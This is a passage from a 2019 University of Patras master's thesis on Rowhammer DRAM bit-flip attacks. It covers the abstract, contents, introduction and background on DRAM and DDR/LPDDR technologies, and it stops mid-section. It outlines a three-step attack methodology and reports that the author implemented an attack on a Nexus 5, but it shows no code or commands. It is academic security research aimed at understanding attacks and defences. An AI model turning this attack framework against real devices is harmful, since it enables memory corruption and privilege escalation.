University of Patras DEPARTMENT OF COMPUTER ENGINEERING AND INFORMATICS DEPARTMENT OF ELECTRICAL AND COMPUTER ENGINEERING

POSTGRADUATE PROGRAM: INTEGRATED HARDWARE AND SOFTWARE SYSTEMS

Postgraduate Thesis of IHSS postgraduate student, University of Patras, Greece

Lidia Pocero Fraile

Subject « Exploiting Embedded DDR HW vulnerabilities to overpass SW security: Rowhammer vulnerabilities and Potent Attacks under various Architecture »

Supervisor

Odysseas Koufopavlou

Postgraduate Thesis number:

Patras, March 2019 CERTIFICATION It is certified that the Postgraduate Thesis entitled « Exploiting Embedded DDR HW vulnerabilities to overpass SW security: Rowhammer vulnerabilities and Potent Attacks under various Architecture »

of IHSS postgraduate student, University of Patras, Greece

Lidia Pocero Fraile was defended in public and was examined in the Department of Electrical and Computer Engineering, University of Patras on 26/03/2019

Supervisor O. Koufopavlou

Committee member Committee member G. Theodoridis N. Sklavos

Postgraduate Thesis number:

Subject: « Exploiting Embedded DDR HW vulnerabilities to overpass SW security: Rowhammer vulnerabilities and Potent Attacks under various Architecture » Student: Supervisor: L. Pocero O. Koufopavlou

Abstract: The increasing capacity of main memory systems has driven to continuous DRAM scaling. The high DRAM density increases the coupling between adjacent DRAM cells, thereby exacerbating RAM failures and worsening the RAM cell reliability. This thesis investigates the reliability issue and security implications of the rowhammer bug where repeated accesses to DRAM rows can cause bit flips in an adjacent row. The bug occurs in most of today’s DDR modules with fatal consequences for security. The fundamental software security assumption that a memory location can be written only from a process with write access as a guarantee that memory contents do not change unless it is a legitimate modification is easily broken when high- frequency memory location accesses to a row can modify the data contained in an adjacent memory region. Since the initial discovery of this security issue, many previous studies have implemented several attacks that leverage rowhammer by exploiting the memory corruption on sensitive data. Under the light of the above danger, in this thesis, an overview of this type of attack is discussed, including attacks, threat directives, and countermeasures. The goal of this research is to exhaustively overview attacks and countermeasures in order to survey the possibility of various existing attack directions and highlight the security risks they can pose to different kind of systems. We propose a specific exploitation vector methodology for rowhammer and summarize all existing attacks techniques under the three vector primitives: discover the under attack memory information, choose a method to directly access DRAM and find a location to hammer. The study aims to provide a guide that can be used to reveal new attacks when combining different techniques for each primitive. Previous researches have demonstrated that the exploits are not only effective against desktop computers or clouds but also against mobile devices, without relying on any software vulnerability. We focus on the study of the attack against ARM architectures by implementing our own attack in native code on an LG Nexus 5 Android device. We carry out our own version of the Phys Feng Shui technique [1], identifying the most crucial and prominent issues emerging from implementing on a real system.

Keywords: Rowhammer Attack; Microarchitectural Attacks; Hardware vulnerability; Software-based fault Injection; Memory disturbances errors;

Περίληψη: Η ανάγκη για αυξανόμενη χωρητικότητα των συστημάτων κύριας μνήμης έχει οδηγήσει σε συνεχή συρρίκνωση της DRAM. Η υψηλή πυκνότητα της DRAM αυξάνει την δυνατότητα παρεμβολής μεταξύ γειτονικών κυττάρων DRAM, αυξάνοντας έτσι τις αποτυχίες της RAM και επιδεινώνοντας την αξιοπιστία των κυττάρων μνήμης RAM. Αυτή η διπλωματική εργασία διερευνά το ζήτημα αξιοπιστίας και τις συνέπειες στην ασφάλεια σε σχέση με το rowhammer σφάλμα, όπου επαναλαμβανόμενες προσβάσεις σε σειρές DRAM μπορούν να προκαλέσουν ανατροπές bit σε μια γειτονική σειρά. Αυτό το σφάλμα εμφανίζεται στις περισσότερες μονάδες DDR σήμερα, με καταστρεπτικές συνέπειες για την ασφάλεια. Η θεμελιώδης αρχή της ασφάλειας του λογισμικού ότι μια θέση μνήμης μπορεί να γραφεί μόνο από μια διαδικασία με πρόσβαση εγγραφής καταρρέει εύκολα όταν το διάβασμα μιάς σειράς της μνήμης με υψηλή συχνότητα μπορεί να τροποποιήσει δεδομένα που περιέχονται σε μια γειτονική περιοχή της μνήμης. Από την αρχική ανακάλυψη αυτού του ζητήματος ασφάλειας, πολλές προηγούμενες μελέτες έχουν υλοποιήσει αρκετές επιθέσεις που αξιοποιούν το rowhammer, εκμεταλλευόμενες την αλλοίωση μνήμης σε ευαίσθητα δεδομένα. Σε σχέση με τον παραπάνω κίνδυνο αυτή η διπλωματική εργασία μελετάει τις επιθέσεις τύπου «rowhammer attack», συμπεριλαμβάνοντας τις επιθέσεις, το μοντέλο της απειλής και τα μέτρα αντιμετώπισης. Ο στόχος της έρευνας είναι η διεξοδική επισκόπηση των επιθέσεων και των αντίμετρων, προκειμένου να διερευνηθούν οι διαφορετικές υπάρχουσες επιθετικές κατευθύνσεις και να τονιστούν οι κίνδυνοι ασφαλείας που μπορούν να δημιουργηθούν σε διαφορετικά συστήματα. Προτείνεται μια συγκεκριμένη μεθοδολογία για την επίθεση «rowhammer» και η κατηγοριοποίηση σε σχέση με αυτή όλων των υπάρχουσων τεχνικών επίθεσης. Η μεθολογία αποτελείται απο τρία διαφορετικά βήματα: ανακάλυψη των πληροφοριών της αρχιτεκτονικής της μνήμης του υπο επίθεση συστήματος, επιλογή μεθόδου για την άμεση πρόσβαση στην DRAM και εύρεση των ευπαθών θέσεων στην μνήμη. Η μελέτη στοχεύει να παρέχει έναν οδηγό που μπορεί να χρησιμοποιηθεί για να αποκαλύψει νέες επιθέσεις που συνδυάζουν διαφορετικές τεχνικές σε κάθε βήμα. Προηγούμενες έρευνες έχουν δείξει ότι εκμετάλλευση του rowhammer, δεν είναι μόνο αποτελεσματική κατά των επιτραπέζιων υπολογιστών ή του υπολογιστικό νέφος (clouds), αλλά και κατά των φορητών συσκευών, χωρίς να σχετίζεται με αδυναμίες του λογισμικού. Εστιάζουμε στην μελέτη των «rowhammer» επιθέσεων σε ARM αρχιτεκτονικές με την «native code» υλοποίηση επίθεσης σε συσκευή LG Nexus 5 Android. Υλοποιούμε την «Phys Feng Shui» τεχνική, προσδιορίζοντας τα πιο σημαντικά ζητήματα που προκαλούνται απο την υλοποίηση σε ένα πραγματικό σύστημα.

CONTENTS

CONTENTS ...... 1 LIST OF FIGURES ...... 3 LIST OF TABLES ...... 4 1 INTRODUCTION ...... 5 2 THEORETICAL BACKGROUND ...... 7 2.1 RAM Memory Types ...... 7 2.1.1 Disturbance Errors in Memories ...... 8 2.2 DRAM Technologies ...... 9 2.3 DRAM Architecture ...... 12 2.4 Refresh Mechanism on DDR Technologies ...... 15 2.5 DRAM Memory controller ...... 16 2.6 Memory Hierarchy ...... 17 2.7 Physical RAM management on Linux ...... 20 2.8 Memory Management ...... 23 2.8.1 DMA (Direct Memory Access) ...... 27 3 DISTURBANCE MECHANISM ON DRAM AND ROWHAMMER ...... 28 3.1 Characterization of the Rowhammer problem ...... 29 3.1.1 Mathematical Characterization of Rowhammering Threshold ...... 30 3.1.1 Data Pattern and Weak cells effect ...... 31 3.2 Triggering Rowhammer ...... 31 3.2.1 Rowhammer Types ...... 33 3.3 Vulnerable DRAM types ...... 35 4 ROWHAMMER EXPLOITATION ...... 37 4.1 Under Attack Memory Information ...... 40 4.1.1 One-location hammer ...... 41 4.1.2 Same bank row detection ...... 42 4.1.3 Find Adjacent Memory Rows ...... 43 4.2 Fast Uncached Directly Dram Access ...... 48 4.2.1 Explicit cache flush ...... 48 4.2.2 Cache Eviction sets ...... 49 4.2.3 Non-Temporal store instructions ...... 53 4.2.4 DMA access ...... 54 4.3 Where To Hammered ...... 55

1

4.3.1 Random Hammer ...... 55 4.3.2 Physical Memory Massaging ...... 56 4.3.3 Memory Waylaying ...... 68 4.4 Attack Interface ...... 69 4.4.1 Page Table Corruption Attacks ...... 70 4.4.2 Escape Sandbox Native Client Restrictions ...... 70 4.4.3 Attacks Across Shared Resources ...... 71 4.4.4 Javascript Based Remote Attack from Browsers ...... 71 4.4.5 Remote Attack On Fast RDMA-Enable Networks ...... 72 4.4.6 Trust Execution Environments (Tee) ...... 72 4.4.7 Flipping Opcodes ...... 73 4.5 Attack Target ...... 73 4.5.1 System Privilege Escalation ...... 74 4.5.2 Remote System Privilege Escalation ...... 75 4.5.3 Confidential Attacks ...... 75 4.5.4 DoS Attacks ...... 77 5 RH COUNTERMEASURES ...... 78 5.1 Disable Under Attack Functionalities ...... 78 5.2 Hardware-Based Solutions ...... 79 5.3 Software-Based Mitigations ...... 80 6 INVESTIGATION OF ROWHAMMER AT EMBEDDED SYSTEMS ...... 83 6.1 ARM Architecture...... 83 6.2 Study Of Rowhammer At Single-Board Computers ...... 86 6.3 DRAMMER: Deterministic Rowhammer Attack On Mobile Platforms ...... 89 6.3.1 Mobile Platforms Characteristics ...... 90 6.3.2 Device Under Attack ...... 93 6.3.3 Drammer Attack Primitives ...... 99 6.3.4 DRAMMER Attack Implementation ...... 100 6.3.5 Bit Flip exploitability ...... 113 6.3.6 Evaluation...... 114 7 CONCLUSION ...... 116 8 APPENDIX 1: Side Channel Attacks ...... 118 9 ACKNOWLEDGEMENTS ...... 119 10 BIBLIOGRAPHY ...... 121

2

LIST OF FIGURES

FIGURE 1 SRAM CELL 7 FIGURE 2 DRAM CELL 8 FIGURE 3 DIMM MODULES ARCHITECTURE EXAMPLE 12 FIGURE 4 2GB DDR3 DIMM ARCHITECTURE. FIGURE IN [12] 14 FIGURE 5 TYPICAL MEMORY HIERARCHY 18 FIGURE 6 CACHE PLACEMENT. FIGURE IN [20] 19 FIGURE 7 COMPLEX ADDRESSING SCHEME IN THE LLC, 64 B CACHE LINE, 4 SLICES AND 2048 SETS PER SLICE. FIGURE IN [22] 20 FIGURE 8 COMPLEX ADDRESSING FUNCTION. FIGURE IN [22] 20 FIGURE 9 LAYOUT MEMORY. FIGURE IN [25] 21 FIGURE 10 MEMORY ZONE FOR 8GB RAM. FIGURE IN [24] 21 FIGURE 11 DEPICTS A KERNEL ALLOCATION OVERVIEW. FIGURE IN [26] 22 FIGURE 12 ALLOCATORS IN THE KERNEL OVERVIEW. FIGURE IN [27] 23 FIGURE 13 X86 PAGE TABLE ENTRY (PTE). FIGURE IN [31] 24 FIGURE 14 VIRTUAL TO PHYSICAL MAPPING FOR X86-32BIT PAGE TABLE ENTRY. FIGURE IN [31] 24 FIGURE 15 VIRTUAL MEMORY SYSTEM SCHEME. FIGURE IN [32] 25 FIGURE 16 VIRTUAL TO PHYSICAL ADDRESS MAPPING. FIGURE IN [32] 26 FIGURE 17 PROCESS ADDRESS SPACE. FIGURE IN [32] 26 FIGURE 18 DIFFERENT HAMMERING STRATEGIES. FIGURE IN [45] 33 FIGURE 19 ROWHAMMER ERROR RATE VS. MANUFACTURING DATE. FIGURE IN [51] 35 FIGURE 20 EFFICIENT GPU CACHE EVICTION STRATEGY. FIGURE IN [59] 53 FIGURE 21 CACHED AND NON-TEMPORAL MEMORY ACCESSES. FIGURE IN [48] 54 FIGURE 22 ROWHAMMER BIT FLIPS FOR DIFFERENT NETWORK CONFIGURATIONS. FIGURE IN [60] 55 FIGURE 23 4-KBYTE PAGE TABLE ENTRY 57 FIGURE 24 HEAP LAYOUT AND EXPLOITATION. FIGURE IN [58] 60 FIGURE 25 MEMCACHED EXPLOIT. FIGURE IN [60] 61 FIGURE 26 ALIGNMENT PROBING PRIMITIVE. FIGURE IN [47] 62 FIGURE 27 PARTIAL REUSE PRIMITIVE. FIGURE IN [47] 62 FIGURE 28 BIRTHDAY HEAP SPRAY PRIMITIVE. FIGURE IN [47] 62 FIGURE 29 FLIP BIT EXPLOITATION: PIVOT TO A COUNTERFEIT OBJECT. FIGURE IN [47] 63 FIGURE 30 MEMORY DEDUPLICATION FOR CONTROL OVER PHYSICAL MEMORY LAYOUT. FIGURE IN [43] 64 FIGURE 31 PAGE TABLE REPLACEMENT ATTACK. FIGURE IN [56] 66 FIGURE 32 MEMORY AMBUSH. FIGURE IN [64] 68 FIGURE 33 PSEUDO CODE TO ILLUSTRATE ATTACKS AGAINST THE OPENSSH SERVER. ON THE LEFT IS THE ORIGINAL CODE AND ON THE RIGHT THE CODE AFTER THE FLIP BIT 77 FIGURE 34 ADDRESS TRANSLATIONS USING SHORT-DESCRIPTION FORMAT TRANSLATION TABLE. FIGURE IN [94] 84 FIGURE 35 BOUNDARIES BETWEEN TTBR0 AND TTBR1 AT COMMUNE ARMV7 CONFIGURATION 84 FIGURE 36 FIRST-LEVEL DESCRIPTOR FORMATS 85 FIGURE 37 SECOND-LEVEL DESCRIPTOR FORMATS 85 FIGURE 38 ARMV7 32-BITS VIRTUAL ADDRESS DESCRIPTION 86 FIGURE 39 CP15 C1 SYSTEM CONTROL REGISTER IN VMSA IMPLEMENTATION. FIGURE IN [94] 88 FIGURE 40 FORMAT OF SCTLR REGISTER INARMV7-A IMPLEMENTATION. FIGURE IN [94] 88 FIGURE 41 /PROC/PAGETYPEINFO KERNEL FILE INFORMATION 98 FIGURE 42 PAGE TABLE LAYOUT WALK ON ANDROID ARM 98 FIGURE 43 VICTIM L* BLOCK AND CRUCIAL INFORMATION OF THE FLIP BIT POSITION. AGGRESSOR ROWS IN ORANGE ABOVE AND BELOW THE VICTIM ROW. 102 FIGURE 44 AVAILABLE MEMORY AFTER EXHAUSTING L BLOCKS 102 FIGURE 45 AVAILABLE MEMORY BEFORE OF START THE ATTACK 102 FIGURE 46 AVAILABLE MEMORY AFTER EXHAUSTING L AND M BLOCKS 103 FIGURE 47 AVAILABLE MEMORY RELEASING THE VICTIM L* BLOCK 104

3

FIGURE 48 BUDDY ALLOCATOR BEHAVIOUR ON THE ALLOCATION OF M BLOCKS 104 FIGURE 49 AVAILABLE MEMORY AFTER ALLOCATING M BLOCKS ON THE L* LOCATION 105 FIGURE 50 AVAILABLE MEMORY AFTER RELEASE THE M* VICTIM BLOCK 105 FIGURE 51 AVAILABLE MEMORY AFTER RELEASING ALL THE L BLOCKS 106 FIGURE 53 AVAILABLE MEMORY LET IT TO THE FATHER PROCESS 107 FIGURE 52 AVAILABLE MEMORY AFTER A CHILD SPREADING THE PTS 107 FIGURE 54 VICTIM PAGE TABLE ENTRY FORMAT 108 FIGURE 55 EXAMPLE OF PHYSICAL ADDRESS OF SOURCE P FROM THE PHYSICAL PAGE OF THE TARGET PT 108 FIGURE 56 RELATIVE POSITIONS OF SOURCE PAGE AND TARGET PAGE IN VICTIM BLOCK L* 109 FIGURE 57 FORMAT OF VIRTUAL ADDRESS FOR SOURCE PAGE P 111 FIGURE 58 FORMAT OF TARGET PAGE TABLE AT VULNERABLE VICTIM PAGE 111 FIGURE 59 VICTIM ROW AND AGGRESSORS ROWS 113

LIST OF TABLES

TABLE 1 DDR TECHNICAL CHARACTERISTICS 10 TABLE 2 LPDDR TECHNICAL CHARACTERISTICS 12 TABLE 3 DDRX AND LPDDRX ORGANIZATION PARAMETERS 13 TABLE 4 DRAM TIMINGS 16 TABLE 5 ROWHAMMER METHODS 40 TABLE 6 VARIOUS TECHNIQUES TO LEARN THE REQUIRED MEMORY INFORMATION 41 TABLE 7 VARIOUS TECHNIQUES USED TO ACCESS DIRECTLY THE DRAM 48 TABLE 8 GPU TWO-LEVEL CACHE SUMMARY 52 TABLE 9 WHERE TO HAMMER 55 TABLE 10 ATTACK INTERFACE 70 TABLE 11 ATTACK TARGET 73 TABLE 12 MOST RECENTLY RASPBERRY PI MODEL SPECIFICATIONS 87 TABLE 13 MOST RECENTLY BEAGLEBONE MODEL SPECIFICATIONS 87 TABLE 14 GENERAL CHARACTERISTICS FOR THE LG NEXUS 5 DEVICE 93 TABLE 15 BUILD PROPERTIES FOR THE DEVICE UNDER ATTACK 97

4

1 INTRODUCTION

Embedded system nodes, like most computing units, cannot be considered trusted due to many known vulnerabilities. Typically, software tools (e.g., antivirus, antimalware, firewalls) can protect a system from attackers taking advantage of those vulnerabilities to inject malicious software. However, security gaps and vulnerabilities exist that cannot be identified by the aforementioned software tools since they are not due to errors in software applications, drivers or the Operating Systems but rather due to the computer architecture and hardware structure itself. Creating software to exploit these vulnerabilities remains hidden from most software cybersecurity tools and thus constitute a serious security risk for all devices using these commodities, vulnerable structures. As the cell density of DRAM modules keeps increasing to guarantee the growing demand for memory capacity in modern computer and embedded system, the electromagnetic interferences between memory cells increase significantly. The interference can eventually corrupt the data stored in memory. In particular, the widespread existence of disturbance errors in most part of the common DRAM modules manufactured from 2012 has been extensively proven [1] [2]. Memory disturbance errors observed in common DRAM modules is widely known as the Rowhammer vulnerability. It was discovered that when a specific row of a DDR (Double Data Rate) memory bank is accessed repeatedly, i.e. is opened (activated) and closed (pre-charged) within a DRAM refresh interval, one or more bit flips can occur in physically-adjacent DRAM rows changing their values [1]. For decades the defences again memory corruption had left aside the threat Hardware Vulnerabilities. Actually, several researchers have observed that Rowhammer vulnerability can be exploited to mount an attack and bypass most of the established software security and trust features. This specific hardware vulnerability issue allows an attacker to alter data in the memory without direct access, thus breaking the MMU (Memory Management Unit) isolation without accessing the victim row at all and without relying on any design or implementation flaws in the isolation mechanism. Such bugs not only influence memory reliability by breaking all popular forms of isolation but also cause a serious security breach that can be used to corrupt system memory, crash a system, obtain and modify secret data or take over the entire system. It is a software-based fault injection attack that uses software to induce the fault of the underlying hardware in a controllable manner which is difficult to prevent. This attack has been categorized under the Microarchitectural attacks family as the most dramatic and widespread example of fault injection that unveiled the possibility of implementing the attack even remotely [3]. Since the first publication of the issue [1] the ability of the Rowhammer attack to defy abstraction barriers between different security domains has been utilized to develop more powerful attacks in various systems. On another hand, these attacks have sparked the interest in developing effective and efficient mitigation techniques. There exists a need to dissect the rowhammer attacks to understand the threat model and determine the attack primitive methodology by studying the common characteristics between the various forms that have been published to date. We break down the attack process into three

5 distinct steps that must be implemented on every threat model trying to exploit the rowhammer vulnerability. An attacker must determine the specific Memory Architecture Characteristics to gather the necessary memory information to be able to determine the physical position of the aggressor’s rows. The Fast Direct access to DRAM is the second challenge in the methodology and it is directly related to the features available on each system. Finally, the attacker must decide where to Hammer, which in most cases means finding a way to place the sensitive data into a vulnerable location discovered during a previous template phase. The practical end-to-end attack implementations are categorized into groups that share common techniques to achieve any of the aforementioned primitives. Furthermore, they are grouped into attacks with common attack targets and attacks that share the same Interfaces to achieve the exploitation of the vulnerability. The aim of this thesis is to provide the overall study of this specific vulnerability and its security implications and clarify each aspect related to the rowhammer attack in order to provide a useful guide for researches to identify new attacks and defences. We pay special attention to the challenges and implications of implementing the attacks on Embedded Systems such as mobiles, tablets and tiny affordable computers such as Raspberry Pi and Beagle Bone Board based on the ARM architecture. Also, our implementation of the attack for Android on the LG Nexus 5 device brings to light the issues of a practical intend to trigger the rowhammer attack on a real system. First of all, the necessary background information is provided to understand every phase of the attack from the DRAM architectures and disturbance error analysis to memory controllers and Kernel Memory Allocators behaviours. Section 3 is dedicated to the rowhammer vulnerability problem statement by studying the origins of the vulnerability and its relationship with, specific memory architectural parameters and data patterns. We also summarize the vulnerable DRAM types until the date. At last, we present the three different methods to trigger the vulnerability in existence with an aim to understand the applicability of each one on different systems. The categorization of the rowhammer attacks into different primitive groups, targets, and interfaces presented in Section 3 is a result of the investigation over all the different exploitations published to date. In addition, a new systematic categorization of the defences proposed by the research community to confront the security issue can be found in Section 5. Based on the intention to completely disable the vulnerability or its exploitability from an attacker, each available countermeasure is analyzed in terms of applicability and success on different vulnerable systems. Finally, our research regarding the Rowhammer attacks on Embedded system has been depicted in Section 6. In that Section, we discuss theoretical research of the challenges faced on the target ARM architecture system combined with an empirical and practical implementation of an Android attack on a real ARMv7 architecture.

6

2 THEORETICAL BACKGROUND

2.1 RAM MEMORY TYPES Computer memory is generally classified as either internal or external memory. The internal memory, Main Memory refers to memory that store small amounts of data that can be accessed quickly while the Computing System is running. In another hand, the external memory is storages devices that can retain or store data persistently. They could be embedded such as hard disk, solid-state drivers or removable storage devices such as USB flash drivers or compact disks. There are basically two kinds of external memories: the ROM (Read Only Memory) that is non- volatile used mainly to start or boot up a Computing System, and the RAM (Random Access Memory) that is a read/write fast memory but volatile. The RAM is the memory that stores data and machine code currently being used. This memory device allows the time of reading/writing data to be independent of the data physical location inside the memory. The RAM takes the form of an integrated circuit mounted in modules and comes in a variety of interface physical connectors, capacities (in MB or GB), speeds (in MHz or GHz) and architectures. Typically, 2,3 or 4 of these modules are installed in the Computer System’s . RAM comes in two primary forms: SRAM and DRAM. The SRAM (Static Random Access Memory) consists of circuits capable of retaining the stored information as long as the power is applied. A latch is formed by two inverters connected as shown in Figure 1. The transistors connect the latch with two-bit lines acting as switches that can be opened or closed under the control of the word line. When the word line is activated (1-level) the sense/write circuits are connected to the bit lines for read/stored the new value. When the word line is at 0-level the transistors are turned off and the latch remains its information as long as the word line is not activated without need any refresh. The SRAM are fasters access speed and lower power consumption but also more expensive (higher cost of manufacture) and lesser memory capacitor than DRAM. It is normally used to create the CPU´s speed-sensitive cache (L1, L2, L3), hard driver buffer/cache and on Digital-to-Analog converters (DAC) on video cards.

Figure 1 SRAM cell

The DRAM stores the binary information in the form of electric charge that applied to capacitors. The stored information at the capacitors tend to lose over a period of time and thus the capacitor must be periodically recharged to retain their data. For storing information in this cell (), the

7 transistor is turned on and an appropriate voltage is applied to the bit line to charge the capacitor. The cell is starting to discharge after the transistor is turned off. The information stored can be read correctly until the capacitor drops below a specific threshold value. Therefore, for dynamic memory to work, either the CPU or the Memory Controller has to recharge all of the capacitors holding it before they discharge. The memory controller reads the memory and then writes it right back. This dynamically refreshing take time which slows down the memory and increases power consumption. On the other hand, it is the simplest circuit cell cheaper to produce and allows to achieve bigger capacities with higher packaging density memories than more complex SRAM cell. Because of this characteristic, DRAM is typically used in System Memory and Video graphics memory.

Figure 2 DRAM cell

2.1.1 Disturbance Errors in Memories The memory errors are encountered when the value read from the memory does not match the value that is supposed to be there. The calling hard errors are associated with persistent physical defects on the memory chip. On the other hand, the error induced by a particle strike that upset internal data while the circuit itself is undamaged, have been referring to soft errors. This disturbance errors, that occur whenever there is a strong enough interaction between two circuit components that should be isolated from each other, are classifying as a reliability problem. The specific issue can afflict different kinds of memory and storage technologies such as SRAM, flash, DRAM and hard-disk. Many different modes of disturbance are possible depending on the specific components that interact. The disturbance generally increases with increasing data store density. Then, as the process technology scale, their robustness and reliability compromise. Two of the major SRAM typical failures modes are: write errors and read disturbance [4]. In addition, soft errors and half select disturbance have arisen as failure source. Even they are unpredictable, both susceptibilities are critical reliability challenges on modern SRAM designs. When a single event causes a multi-bit upset, a single word has multiple corrupted bits which cannot be fixed by using error corrected codes. The easiest way to avoid it is to place the logical words on bits that are not physically adjacent. This bit-interleaving strategic suppose increases of half selective disturb problem [4]. A cell is a half-selected when bellowing to the select row and to the non-select columns group. On an activated word line, the selected cells are writing, and the half-selected cells are disturbed by the pre-charged write bit lines. Then the access transistor in this cell is turning on and the internal data could flip. All these SRAM failures have been studying and different optimizations have been proposed on [4] [5] [6].

8

DRAM manufacturers have been aware of disturbance errors, due to the use of mitigation technics based on both inter-cell isolations, through circuit-level techniques, and screening for disturbance error during post-production testing, until different studies expose on 2014 the existence and the widespread nature of disturbance errors in the then actual DRAM chips [1]. The root cause of the disturbance is the voltage fluctuations in the wordline. The wordline of each row cell must be enabled by raising its voltage to access a cell. Many activations to the same row make the wordline to toggle repeatedly on and off having a disturbance effect on adjacency rows. Then, some bits of the nearby rows can leak their charge before of their value being restored and change permanently the store data [1].

2.2 DRAM TECHNOLOGIES The RAM modules are cards (printed circuit boards) with soldered DRAM memory chips on one or both sides. The DRAM implementation is based on a topology of an electrical circuit () that allows reaching high memory densities, achieving to integrate hundreds or thousands of megabits. In addition to the DRAM, the modules have an integrated system that allows the computer to identify them by the communication protocol. The modules are connected with the rest of the components with pins following the industry standard. The Single In-Line (SIMM) DRAM packet is now obsolete. The Dual In-Line Memory Module (DIMM) is the current physical memory module with pins on both sides of the modules and several architectures for different platforms. The original ones had a 168-pin connector supporting 64-bit data bus, twice the data width of which is translating to faster overall performance. Latest DIMMs based on DDR4 have 288-pin connectors for increased data throughput. The Double-Date Rate SDRAM (DDR SDRAM) is the most common types of DRAM use today. It is a Synchronous DRAM (SDRAM) memory type [7], whose access speed is directly synchronized with the CPU´s clock, and operates at the CPU memory bus. The memory is divided into separate banks and then the CPU can process overlapping instructions in parallel (pipelining) per clock cycle which results in higher overall CPU transfer/performance rates. The DDR nearly double the transfer rate by transferring data on both the rising and the falling edges of the clock signal without any increase on the clock frequency. To access the data at a high rate, the memory cells are organized into two groups that are accessed separately [8]. The nomenclature used to define the DDR-type memory modules is DDRx-yyyy PCx-zzz; where x represents the DDR generation, yyyy the effective frequency in MHz, and zzz the maximum data transfer rate per second in megabytes (MB/s) which can be achieved between the memory module and the memory controller. The transfer rate depends on two factors, the data bus width (usually 64 bits) and the effective work frequency.  DDR1: Becomes a standard in 2000 and was an advancement over SDRAM technology that increases memory bandwidth and performance. It is present as DIMM modules of 184 pins for desktop computers and 144 pins for laptops. It saves power by working at a lower standard voltage (2.5V or 2.6V) [9]. The available types are: DDR 200 PC1600, DDR 266 PC2100, DDR 333 PC2700, DDR 400 PC3200, DDR 433 PC3500 and, DDR 500 PC4500 [10].

9

 DDR2: It is the evolutionary upgrade to DDR1. While still double data rate, the DDR2 is faster because it can run at higher clock speeds enabling effective operation at two times the DDR1 bus speed. It consumes less power than its predecessor by reducing its operation voltage (1.8V) [9]. The DDR2 modules are available in several form factors suitable for diverse applications, including 240-pin full-size DIMMs, 200-pin SO-DIMMs, 244-pin Mini-DIMMs, and 240-pin FB-DIMMs. Very Low Profile (VLP) DIMMs and Mini- UDIMM options are also available for compact systems. The available types are: DDR2- 400 PC2-3200, DDR2-533 PC2-4200, DDR2-667 PC2-5300, DDR2-800 PC-6400, DDR2-1066 PC2-8600 and, DDR2-1200 PC2-9000 [10].  DDR3: It improves performance over DDR2 SDRAM through advanced signal processing (reliability). It achieves greater memory capacity, lower power consumption (1.5 V), and higher standard clock speeds (up to 800 Mhz) [9]. It is appearing in a wide range of form factors and features including SODIMM, and Mini-DIMM. DDR3 SDRAM is supported by the latest CPU and chipsets such as the Intel Core i7 series, the AMD AM3 Phenom processor and the latest AMD Embedded Enterprise Chipsets. The available types are DDR3-800 PC3-6400, DDR3-1066 PC3-8500, DDR3-1333 PC3-10600, DDR3-1600 PC3- 12800, DDR3-1866 PC3-14900, DDR3-2133 PC3-1700, DDR3-2400 PC3-19200 and, DDR3- 2666 PC3-21300 [10].  DDR4: Released to the market in 2014 it is a higher speed successor to the DDR2 and DDR3 technologies. The internal configuration as an 8-bank and the device uses as 8n- prefetch architecture achieve the high-speed operation. Includes primary advantages such as higher module density, lower voltage requirements (1.2 to 1.4 V) with frequency up to 1600MHz and, better manufacturing ability. It uses a 288-pin configuration, which also prevents backward compatibility [9]. The available types are DDR4-1600 PC4-1600, DDR4-1866 PC4-1866, DDR4-2133 PC4-17000, DDR4-2400 PC4-19200 and, DDR4-2666 PC4-25600 [10]. A comparison table of the technical characteristics between the actual commercial DDR is showing below in Table 1. The data has been found out in [8] [9]. DDR2 DDR3 DDR4 Clock frequency 200 ~ 400 MHz 400 ~ 800 MHz 1066 ~ 16000 MHz Band Width 4.2 ~ 6.4 GB/s 8.5 ~ 14.9 GB/s 17 ~ 21.3 GB/s Date Rate (per pin) 400 ~ 800 Mbps 800 ~ 1600 Mbps 2000 ~ 3200 Mbps Core Voltage 1.8V 1.5V/1.35V 1.4V/1.2V I/O Voltage 1.8V 1.5V/1.35V 1.2 V I/O Width x4/x8/x16 x4/x8/x16 x4/x8/x16 Prefetch 4n 8n 8n Number of Banks 4/8 8 16 (on 2 or 4 select bank groups) Burst length 4/8 8/4 with BC 8/4 with BC Density 256Mb ~ 4Gb 512Mb ~ 8Gb 2Gb ~ 16Gb Table 1 DDR technical characteristics

10

The Graphics Double Data Rate Synchronous Dynamic RAM (GDDR SDRAM) is a type of DDR SDRAM that is specifically designed for video graphics rendering and used in modern PC games for realistic high definition environment. Similar to DDR SDRAM, GDDR SDRAM has its own evolutionary line (improving performance and lowering power consumption): GDDR2 SDRAM, GDDR3 SDRAM, GDDR4 SDRAM, and GDDR5 SDRAM. The biggest different regards how bandwidth is favoured over latency because is expected process massive amount of data but not necessarily at the fastest speeds. The Low Power Double Data Rate memory (LPDDR) is a type of double data rate synchronous DRAM for mobile phones and Tablet PC applications. The original low power DDR (LPDDR1) is a slightly modified form of DDR SDRAM, with several changes to reduce power consumption. Most significantly, the supply voltage is reduced from 2.5 to 1.8 V [9]. Additionally, it is exploiting the fact that DRAMs require to refresh less often at low temperatures to implement a temperature- compensated refresh. Also, can implement partial array self-refresh and deep power down mode with delete all memory contents. Furthermore, the chips are smaller using less board space than their non-mobile equivalents. The different types are [9]:  LP-DDR2: It is a revised low-power DDR interface with similar to low-power states to the basic LPDDR, just some additional array refresh option and reduced working voltage (1.2 V). They are available from LPDDR-200 to LPDDR-1066 (clock frequencies of 100 to 533MHz).  LP-DDR3: LPDDR3 offers a higher data rate, improved bandwidth and power efficiency, and higher memory densities over its groundbreaking predecessor, LPDDR2. In comparison to LPDDR2, LPDDR3 offers a higher data rate, greater bandwidth and power efficiency, and higher memory density. LPDDR3 achieves a data rate of 1600 MT/s and utilizes key new technologies: write-levelling and command/address training [9]. Products using LPDDR3 include the 2013 MacBook Air, iPhone 5S, iPhone 6, Nexus 10, Samsung Galaxy S4 (GT-I9500) and Microsoft Surface Pro 3.  LP-DDR4: The LPDDR4 doubling data rates (up to 3200 MT/s) over the last generation, was designed for a two-channel die with 16 bits per channel which lowers the power consumption thanks to shorter data paths and improves operational speed. Achieved 17GB/s per die but can still be arranged in a dual-channel configuration to reach much higher speeds. To save on energy, LPDDR4 chips lower the nominal operating voltage from 1.2V to 1.1V [9]. The standard now also supports an improved power saving low- frequency mode, which can bring the clock speed down for further battery savings when performing simpler background tasks. Mobile SoCs using LPDDR4 RAM are for example Qualcomm’s Snapdragon 810 and Samsung’s Exynos 7420, which is used in both flagship offerings of the Samsung Galaxy S6 and Galaxy S6 Edge, LG’s latest flagship and, the LG G Flex 2, as well. A characteristic comparison table between the different LPDDR technologies it is showing below [9]. Notice that all of them 